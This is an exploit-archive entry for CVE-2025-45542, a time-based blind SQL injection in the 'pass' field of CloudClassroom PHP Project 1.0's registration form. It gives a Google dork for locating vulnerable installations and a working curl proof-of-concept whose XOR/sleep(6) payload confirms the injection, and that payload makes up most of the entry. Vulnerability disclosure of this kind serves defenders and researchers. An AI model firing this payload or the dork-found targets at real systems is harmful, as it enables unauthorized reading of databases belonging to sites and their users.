CloudClassroom PHP Project 1.0 - SQL Injection



EKU-ID: 56174 CVE: CVE-2025-45542 OSVDB-ID:
Author: Sanjay Singh Published: 2025-06-05 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542

# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.

# PoC Request (simulated using curl):

curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

# The server response will be delayed if the SQL condition is true, confirming the injection point.